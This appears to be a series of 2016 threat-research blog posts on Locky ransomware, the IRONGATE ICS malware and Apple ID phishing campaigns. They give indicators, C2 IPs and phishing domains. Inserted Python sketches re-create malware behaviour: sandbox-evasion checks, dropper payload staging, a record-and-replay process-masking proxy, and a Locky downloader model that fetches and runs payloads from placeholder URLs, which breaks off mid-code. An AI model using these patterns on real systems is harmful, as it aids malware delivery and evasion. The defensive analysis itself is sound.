    • id is set to a unique identifier generated for the compromised system.
    • pubkey is set to a binary buffer that contains a public RSA key.
    • paytext is set to a binary buffer containing the recovery instructions.
    • completed is set to 1.
  • The malware changes the desktop background to a bitmap containing the ransom instructions.
    • HKCU\Control Panel\Desktop\Wallpaper is set to: %CSIDL_DESKTOPDIRECTORY%\_Locky_recover_instructions.bmp
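For quick triage, the registry artifacts listed above can be checked on a suspect host with a short Python sketch (a minimal example based on the value names reported in this analysis):

    import winreg

    def check_locky_registry_artifacts():
        """Return which Locky value names exist under HKCU\\Software\\Locky,
        or an empty list if the key does not exist."""
        found = []
        try:
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Locky")
        except OSError:
            return found
        for name in ("id", "pubkey", "paytext", "completed"):
            try:
                winreg.QueryValueEx(key, name)
                found.append(name)
            except OSError:
                pass
        winreg.CloseKey(key)
        return found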

Network-Based Signatures

Command and Control (CnC)
  • The malware communicates with the following hard-coded hosts using HTTP over TCP port 80. The malware also uses a domain name generation algorithm as described below.
    • 188.138.88.184
    • 31.41.47.37
    • 5.34.183.136
    • 91.121.97.170
Beacon Packet
  • The malware beacon builds an HTTP POST request to /main.php, as shown in Figure 9. The POST data is encoded using a custom algorithm.

Figure 9. HTTP POST request polling packet (general packet structure)

Domain Generation Algorithm (DGA)

This sample contains a domain name generation algorithm that is based on the current month, day and year. There are eight possible domains per day and the domains change on the first of the month and on even numbered days. Figure 10 contains Python code to generate the eight possible domain names for the current date.

Figure 10. Locky Domain Generation Algorithm
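To give a feel for how a date-seeded DGA with these properties can work, the sketch below is a generic illustration only: it is not the actual Locky algorithm shown in Figure 10, and the seed construction, hashing and TLD list are invented for demonstration. The seed changes only on the first of the month and on even-numbered days, and each seed yields eight candidate domains.

    import datetime
    import hashlib

    def example_dga(date, count=8, tlds=("com", "ru", "info", "biz")):
        """Generic date-seeded DGA: the seed changes on the 1st of the month
        and on even-numbered days, producing `count` domains per seed."""
        day = 1 if date.day == 1 else date.day - (date.day % 2)
        seed = "%04d-%02d-%02d" % (date.year, date.month, day)
        domains = []
        for i in range(count):
            digest = hashlib.md5(("%s|%d" % (seed, i)).encode()).hexdigest()
            domains.append(digest[:12] + "." + tlds[i % len(tlds)])
        return domains

    print(example_dga(datetime.date.today()))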

[1] http://arstechnica.com/security/2016/03/kentucky-hospital-hit-by-ransomware-attack/

IRONGATE ICS Malware: Nothing to See Here...Masking Malicious Activity on SCADA Systems

2 June 2016 at 12:00

In the latter half of 2015, the FireEye Labs Advanced Reverse Engineering (FLARE) team identified several versions of an ICS-focused malware crafted to manipulate a specific industrial process running within a simulated Siemens control system environment. We named this family of malware IRONGATE.

FLARE found the samples on VirusTotal while researching droppers compiled with PyInstaller — an approach used by numerous malicious actors. The IRONGATE samples stood out based on their references to SCADA and associated functionality. Two samples of the malware payload were uploaded by different sources in 2014, but none of the antivirus vendors featured on VirusTotal flagged them as malicious.

Siemens Product Computer Emergency Readiness Team (ProductCERT) confirmed that IRONGATE is not viable against operational Siemens control systems and determined that IRONGATE does not exploit any vulnerabilities in Siemens products. We are unable to associate IRONGATE with any campaigns or threat actors. We acknowledge that IRONGATE could be a test case, proof of concept, or research activity for ICS attack techniques.

Our analysis finds that IRONGATE invokes ICS attack concepts first seen in Stuxnet, but in a simulation environment. Because the body of industrial control systems (ICS) and supervisory control and data acquisition (SCADA) malware is limited, we are sharing details with the broader community.

Malicious Concepts

Deceptive Man-in-the-Middle

IRONGATE's key feature is a man-in-the-middle (MitM) attack against process input-output (IO) and process operator software within industrial process simulation. The malware replaces a Dynamic Link Library (DLL) with a malicious DLL, which then acts as a broker between a PLC and the legitimate monitoring software. This malicious DLL records five seconds of 'normal' traffic from a PLC to the user interface and replays it, while sending different data back to the PLC. This could allow an attacker to alter a controlled process unbeknownst to process operators.

Sandbox Evasion

IRONGATE's second notable feature is sandbox evasion. Some droppers for the IRONGATE malware would not run if VMware or Cuckoo Sandbox environments were detected. These checks help the malware avoid detection and resist analysis, and the effort spent developing them indicates that the author wanted the code to withstand casual analysis attempts. It also implies that IRONGATE’s purpose was malicious, as opposed to being a tool written for legitimate purposes.

Dropper Observables

We first identified IRONGATE when investigating droppers compiled with PyInstaller — an approach used by numerous malicious actors. In addition, strings found in the dropper include the word “payload”, which is commonly associated with malware.

Unique Features for ICS Malware

While IRONGATE malware does not compare to Stuxnet in terms of complexity, ability to propagate, or geopolitical implications, IRONGATE leverages some of the same features and techniques Stuxnet used to attack centrifuge rotor speeds at the Natanz uranium enrichment facility; it also demonstrates new features for ICS malware.

  • Both pieces of malware look for a single, highly specific process.
  • Both replace DLLs to achieve process manipulation.
  • IRONGATE detects malware detonation/observation environments, whereas Stuxnet looked for the presence of antivirus software.
  • IRONGATE actively records and plays back process data to hide manipulations, whereas Stuxnet did not attempt to hide its process manipulation, but suspended normal operation of the S7-315 so even if rotor speed had been displayed on the HMI, the data would have been static.

A Proof of Concept

IRONGATE’s characteristics lead us to conclude that it is a test, proof of concept, or research activity.

  • The code is specifically crafted to look for a user-created DLL communicating with the Siemens PLCSIM environment. PLCSIM is used to test PLC program functionality prior to in-field deployment. The DLLs that IRONGATE seeks and replaces are not part of the Siemens standard product set, but communicate with the S7ProSim COM object. Malware authors test concepts using commercial simulation software.
  • Code in the malicious software closely matched usage on a control engineering blog dealing with PLCSIM (https://alexsentcha.wordpress.com/using-s7-prosim-with-siemens-s7-plcsim/ and https://pcplcdemos.googlecode.com/hg/S7PROSIM/BioGas/S7%20v5.5/).
  • While we have identified and analyzed several droppers for the IRONGATE malware, we have yet to identify the code’s infection vector.
  • In addition, our analysis did not identify what triggers the MitM payload to install; the scada.exe binary that deploys the IRONGATE DLL payload appears to require manual execution.
  • We have not identified any other instances of the ICS-specific IRONGATE components (scada.exe and Step7ProSim.dll), despite their having been compiled in September of 2014.
  • Siemens ProductCERT has confirmed that the code would not work against a standard Siemens control system environment.

Implications for ICS Asset Owners

Even though process operators face no increased risk from the currently identified members of the IRONGATE malware family, IRONGATE provides valuable insight into adversary mindset.

Network security monitoring, indicator of compromise (IoC) matching, and good practice guidance from vendors and other stakeholders represent important defensive techniques for ICS networks.

To specifically counter IRONGATE’s process attack techniques, ICS asset owners may, over the longer term, implement solutions that:

  • Require integrity checks and code signing for vendor and user generated code. Lacking cryptographic verification facilitates file replacement and MitM attacks against controlled industrial processes.
  • Develop mechanisms for sanity checking IO data, such as independent sensing and backhaul, and comparison with expected process state information. Ignorance of expected process state facilitates an attacker’s ability to achieve physical consequence without alarming operators.

Technical Malware Analysis

IRONGATE Dropper Family

FireEye has identified six IRONGATE droppers: bla.exe, update.exe1, update.exe2, update.exe3, update_no_pipe.exe1, and update_no_pipe.exe2. All but one of these Python-based droppers first check for execution in a VMware or Cuckoo Sandbox environment. If such an environment is found, the malware exits.

If not found, the IRONGATE dropper extracts a UPX-packed, publicly available utility (NirSoft NetResView version 1.27) to audiodg.exe in the same directory as the dropper. The dropper then executes the utility using the command audiodg.exe /scomma scxrt2.ini. This command populates the file scxrt2.ini with a comma-separated list of network resources identified by the host system.

The dropper iterates through each entry in scxrt2.ini, looking for paths named move-to-operational or move-to-operational.lnk. If a path is found, the dropper first extracts the Base64-encoded .NET executable scada.exe to the current directory and then moves the file to the path containing move-to-operational or move-to-operational.lnk. The path move-to-operational is interesting as well, perhaps implying that IRONGATE was not seeking the actual running process, but rather a staging area for code promotion. The dropper does not execute the scada.exe payload after moving it.
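A simplified Python sketch of this search-and-stage logic, reconstructed from the behavior described above rather than taken from the dropper itself, looks roughly like the following (tool and file names are as reported; error handling and the Base64 extraction of scada.exe are omitted):

    import csv
    import subprocess

    def find_staging_path(resource_file="scxrt2.ini"):
        """Enumerate network resources with the dropped NetResView copy and
        return the first path ending in 'move-to-operational'(.lnk)."""
        subprocess.call(["audiodg.exe", "/scomma", resource_file])
        with open(resource_file, newline="") as handle:
            for row in csv.reader(handle):
                for field in row:
                    if field.endswith(("move-to-operational",
                                       "move-to-operational.lnk")):
                        return field  # scada.exe would then be moved here
        return None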

Anti-Analysis Techniques

Each IRONGATE dropper currently identified deploys the same .NET payload, scada.exe. All but one of the droppers incorporated anti-detection/analysis techniques to identify execution in VMware or the Cuckoo Sandbox. If such environments are detected, the dropper will not deploy the .NET executable (scada.exe) to the host.

Four of the droppers (update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, and update.exe3) detect Cuckoo environments by scanning subdirectories of %SystemDrive%. Directories with names longer than five but fewer than ten characters are inspected for the subdirectories drop, files, logs, memory, and shots. If a matching directory is found, the dropper does not attempt to deploy the scada.exe payload.

The update.exe1 and update.exe3 droppers contain code for an additional Cuckoo check using the SysInternals pipelist program, install.exe, but the code is disabled in each.

The update.exe2 dropper includes a check for VMware instead of Cuckoo. The VMware check looks for the registry key HKLM\SOFTWARE\VMware, Inc.\VMware Tools and the files %WINDIR%\system32\drivers\vmmouse.sys and %WINDIR%\system32\drivers\vmhgfs.sys. If any of these are found, the dropper does not attempt to deploy the scada.exe payload.
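The two environment checks can be summarized in Python roughly as follows (a sketch based on the behavior described above, not the droppers' own code; whether every Cuckoo marker directory must be present, rather than any one of them, is an assumption):

    import os
    import winreg

    CUCKOO_MARKERS = {"drop", "files", "logs", "memory", "shots"}

    def looks_like_cuckoo():
        """Inspect %SystemDrive% subdirectories whose names are longer than
        five and shorter than ten characters for Cuckoo working directories."""
        root = os.environ.get("SystemDrive", "C:") + "\\"
        for name in os.listdir(root):
            path = os.path.join(root, name)
            if os.path.isdir(path) and 5 < len(name) < 10:
                if CUCKOO_MARKERS.issubset(os.listdir(path)):
                    return True
        return False

    def looks_like_vmware():
        """Check for the VMware Tools registry key and two VMware drivers."""
        windir = os.environ.get("WINDIR", r"C:\Windows")
        drivers = (os.path.join(windir, "system32", "drivers", name)
                   for name in ("vmmouse.sys", "vmhgfs.sys"))
        if any(os.path.exists(path) for path in drivers):
            return True
        try:
            winreg.CloseKey(winreg.OpenKey(
                winreg.HKEY_LOCAL_MACHINE,
                r"SOFTWARE\VMware, Inc.\VMware Tools"))
            return True
        except OSError:
            return False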

The dropper bla.exe does not include an environment check for either Cuckoo or VMware.

scada.exe Payload

We surmise that scada.exe is a user-created payload used for testing the malware. First, our analysis did not indicate what triggers scada.exe to run. Second, Siemens ProductCERT informed us that scada.exe is not a default file name associated with Siemens industrial control software.

When scada.exe executes, it scans drives attached to the system for filenames ending in Step7ProSim.dll. According to the Siemens ProductCERT, Step7ProSim.dll is not part of the Siemens PLCSIM software. We were unable to determine whether this DLL was created specifically by the malware author, or if it was from another source, such as example code or a particular custom ICS implementation. We surmise this DLL simulates generation of IO values, which would normally be provided by an S7-based controller, since the functions it includes appear derived from the Siemens PLCSIM environment.

If scada.exe finds a matching DLL file name, it kills all running processes with the name biogas.exe. The malware then moves Step7ProSim.dll to Step7ConMgr.dll and drops a malicious Step7ProSim.dll – the IRONGATE payload – to the same directory.

The malicious Step7ProSim.dll acts as an API proxy between the original user-created Step7ProSim.dll (now named Step7ConMgr.dll) and the application biogas.exe that loads it. Five seconds after loading, the malicious Step7ProSim.dll records five seconds of calls to ReadDataBlockValue. All future calls to ReadDataBlockValue return the recorded data.

Simultaneously, the malicious DLL discards all calls to WriteDataBlockValue and instead calls WriteInputPoint(0x110, 0, 0x7763) and WriteInputPoint(0x114, 0, 0x7763) every millisecond. All of these functions are named similarly to those in the Siemens S7ProSim v5.4 COM interface. It appears that other API calls are passed through the malicious DLL to the legitimate DLL without modification.
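Conceptually, the malicious DLL behaves like the record-and-replay broker sketched below in Python (an illustration of the pattern only; the real component is a .NET DLL wrapping the S7ProSim COM interface, and the timing and write handling are simplified):

    import itertools
    import time

    class RecordReplayProxy:
        """Broker between an operator interface and a process backend that
        records reads for a short window, then replays them forever while
        silently dropping operator writes."""

        def __init__(self, backend, record_seconds=5):
            self._backend = backend
            self._deadline = time.monotonic() + record_seconds
            self._recorded = []
            self._replay = None

        def read_value(self, *args):
            if time.monotonic() < self._deadline or not self._recorded:
                value = self._backend.read_value(*args)
                self._recorded.append(value)
                return value
            if self._replay is None:
                self._replay = itertools.cycle(self._recorded)
            return next(self._replay)  # the operator keeps seeing 'normal' data

        def write_value(self, *args):
            pass  # operator writes never reach the process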

Biogas.exe

As mentioned previously, IRONGATE seeks to manipulate code similar to that found on a blog dealing with simulating PLC communications using PLCSIM, including the use of an executable named biogas.exe.

Examination of the executable from that blog’s demo code shows that the WriteInputPoint function calls with byte indices 0x110 and 0x114 set pressure and temperature values, respectively:

IRONGATE:

    WriteInputPoint(0x110, 0, 0x7763)
    WriteInputPoint(0x114, 0, 0x7763)

Equivalent pseudocode from biogas.exe:

    S7ProSim.WriteInputPoint(0x110, 0, (short)this.Pressure.Value)
    S7ProSim.WriteInputPoint(0x114, 0, (short)this.Temperature.Value)

We have been unable to determine the significance of the hardcoded value 0x7763, which is passed in both instances of the write function.

Because of the noted indications that IRONGATE is a proof of concept, we cannot conclude IRONGATE’s author intends to manipulate specific temperature or pressure values associated with the specific biogas.exe process, but find the similarities to this example code striking.

Artifacts and Indicators

PyInstaller Artifacts

The IRONGATE droppers are Python scripts converted to executables using PyInstaller. The compiled droppers contain PyInstaller artifacts from the system the executables were created on. These artifacts may link other samples compiled on the same system. Five of the six file droppers (bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2 and update.exe3) all share the same PyInstaller artifacts listed in Table 1.

Table 1: Pyinstaller Artifacts

The remaining dropper, update.exe2, contains the artifacts listed in Table 2.

Table 2: Pyinstaller Artifacts for update.exe2

Unique Strings

Figures 1 and 2 list the unique strings discovered in the scada.exe and Step7ProSim.dll binaries.

Figure 1: Scada.exe Unique Strings

Figure 2: Step7ProSim.dll Unique Strings

File Hashes

Table 3 contains the MD5 hashes, file and architecture type, and compile times for the malware analyzed in this report.

Table 3: File MD5 Hashes and Compile Times

FireEye detects IRONGATE. A list of indicators can be found here.

Special thanks to the Siemens ProductCERT for providing support and context to this investigation.

Rotten Apples: Apple-like Malicious Phishing Domains

7 June 2016 at 12:00

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and the UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique in that they serve the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information – including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows users to store passwords and credit card information and have them entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains presented an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScript that creates the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on analyzing the HTML content and forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com , icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique in that a simple GET request to any of these domains results in encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

The encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions, including number system conversions and pseudo-random pattern modifiers, followed by XOR decoding with the fixed key (or password) “zycode”, before the actual HTML phishing content is finally produced (refer to Figure 15 and Figure 16 in Appendix 1 for the complete code). Phishing detection systems that rely solely on the HTML in the response will completely fail to detect content generated using this technique.
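The final XOR stage can be reproduced with a few lines of Python (a minimal sketch of that single step only; the preceding transformations in the chain are not reproduced here):

    def xor_decode(data, key=b"zycode"):
        """Repeating-key XOR -- the last stage of the kit's decoding chain."""
        return bytes(byte ^ key[i % len(key)] for i, byte in enumerate(data))

    # XOR is symmetric, so encoding and decoding are the same operation.
    sample = xor_decode(b"<html>...phishing form...</html>")
    assert xor_decode(sample) == b"<html>...phishing form...</html>"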

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite is a tool for testing and attacking web applications: https://portswigger[.]net/burp/. The Burp session of a user supplying a login and password to the HTML form is shown in Figure 3. Here we can see five variables (u, p, x, y and cc) and a cookie being sent via the HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next, the user is presented with the ask3.asp webpage shown in Figure 5.

 

Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail, captured with Burp Suite, is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tries to supply the same Apple ID twice, they are redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirects the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were the Chinese names “Yu Hu”, “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all of these domains were registered with qq[.]com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that it had been flagging similar domains with increasing frequency. Analyzing the registration information revealed some interesting patterns. From January 2016 to the time of writing, the system marked around 240 unique domains related to Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique registrant email addresses: 64 unique emails at qq[.]com, 36 unique Gmail accounts, 18 unique addresses each at 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in the following ways:

  • The domain list provided here could be used by Apple customers as a blacklist: they can avoid browsing to the listed domains and supplying credentials to them, regardless of whether the links arrive via SMS, email or an instant messaging service.
  • Apple credential phishing detection teams could use this information, as it indicates that domains registered with these email addresses, registrant names and addresses, or combinations thereof, are potentially malicious and serving phishing content. It could be used to block future domains registered by the same entities; a minimal sketch of such a registrant-based check follows this list.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as qq[.]com, 126[.]com and 138[.]com. It has also been observed that, instead of names, the attackers used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.
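The following Python sketch shows how registrant data like this could feed a simple domain triage check. It is an illustration rather than FireEye detection code; the helper name is hypothetical, and the example values come from the registrant patterns described above.

SUSPECT_EMAIL_PROVIDERS = {"qq.com", "163.com", "126.com", "139.com"}
SUSPECT_REGISTRANTS = {"yu hu", "wu yan", "yu fei", "yu zhe"}
APPLE_KEYWORDS = ("apple", "icloud", "itunes", "appleid")

def is_suspicious(domain, registrant_name, registrant_email):
    # Flag a domain that imitates Apple branding and whose WHOIS registrant
    # matches an email provider or registrant name already tied to the campaign.
    looks_like_apple = any(k in domain.lower() for k in APPLE_KEYWORDS)
    provider = registrant_email.lower().rsplit("@", 1)[-1]
    return looks_like_apple and (
        provider in SUSPECT_EMAIL_PROVIDERS
        or registrant_name.lower() in SUSPECT_REGISTRANTS
    )

# Example using a domain from the campaign and a numeric qq[.]com registrant:
print(is_suspicious("icloud-findip.com", "Yu Hu", "545454@qq.com"))  # True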
Geo-location

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.

 

Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)... 109.123.121.10

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)|109.123.121.10|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’

 

100%[============================================================================================================>] 203         --.-K/s   in 0s      

 

2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />

 

This code redirects the browser to this URL/page:

http://manageAppleid84913[.]net/signin.php?c=OTYwNzUyNjlGUjU0OTYwNTQ5NDY0MDgxMjQ4OTQ5OTk0MTQ3MDc1NjYyOA==&log=1&sFR=ODc0MjQyNTEyNzMyODE1NTMxNTQ5c2RmZ3M1ZjRzNjQzMDU5MjUzMzg4NDMzNzE1&email=#
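Because the redirect happens through a meta-refresh tag rather than an HTTP 3xx response, an analysis pipeline can extract the target page before any JavaScript runs. The following is a minimal, illustrative Python sketch of that triage step using only the standard library; the function name is hypothetical and the example domain is one observed in this campaign.

import re
import urllib.request

META_REFRESH = re.compile(
    r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\d+;\s*URL=([^"\']+)["\']',
    re.IGNORECASE,
)

def meta_refresh_target(url):
    # Fetch the landing page and return the meta-refresh destination, if any.
    html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    match = META_REFRESH.search(html)
    return match.group(1) if match else None

# e.g. meta_refresh_target("http://manageAppleid84913.net") would have returned
# "signin.php?c=...&log=1&sFR=...&email=" while the site was still live.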

Visiting this signin.php URL loads highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form is submitted to signin-box-disabled.php, and JavaScript and jQuery create the page seen in Figure 11, informing the user that the Apple ID provided has been locked and that they must unlock it:

Figure 11: Phishing page suggesting victims to unlock their Apple IDs

Clicking on unlock leads the user to the page profile.php, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country portion of the address drop-down menu only offered options for England, Scotland and Wales, suggesting that this attack targets these regions only.

Figure 12: User information requested by phishing page

On submitting false information on this form, the user is shown a page asking them to wait while the entered information is verified. After a couple of seconds of processing, the page informs the user that their Apple ID has been successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real Apple login page

Domain Registration Information

It was observed that all of these domains used the WHOIS privacy protection feature offered by many registrars. This feature enables registrants to hide their personal and contact information, which would otherwise be available via the WHOIS service. These domains were registered with the email “contact@privacyprotect[.]org”.

Geo-location

All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.

Conclusion

Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. Highlighted in green are functions implementing number system converters, pseudo-random pattern decoders and bit-level binary operators

Figure 16: Obfuscated JavaScript served by the phishing site. Highlighted in green are functions implementing number system converters, pseudo-random pattern decoders and bit-level binary operators; highlighted in red are the XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:

https://support.apple.com/HT203126
http://www.apple.com/legal/more-resources/phishing/
https://support.apple.com/HT204759

 

Locky is Back Asking for Unpaid Debts

24 June 2016 at 17:30

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. Up to that point, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, a few updates were seen in both the JavaScript-based downloader and the Locky payload.

The JavaScript downloader does the following (re-created in a Python sketch after step 6):

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.
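For reference, the downloader logic described in steps 1 through 6 can be modeled in Python as follows. This is an analysis aid re-implemented from the description above, not the actual JavaScript; the URL list and XOR key are campaign-specific and are shown here only as placeholders.

import time
import subprocess
import urllib.request

PAYLOAD_URLS = ["http://a.example/counter", "http://b.example/counter"]  # placeholders
XOR_KEY = b"\x41"                                                        # placeholder key
MIN_SIZE, MAX_SIZE = 143360, 153660   # size window enforced in Figure 4

def fetch_and_run():
    for url in PAYLOAD_URLS:                       # step 1: iterate over URLs
        try:
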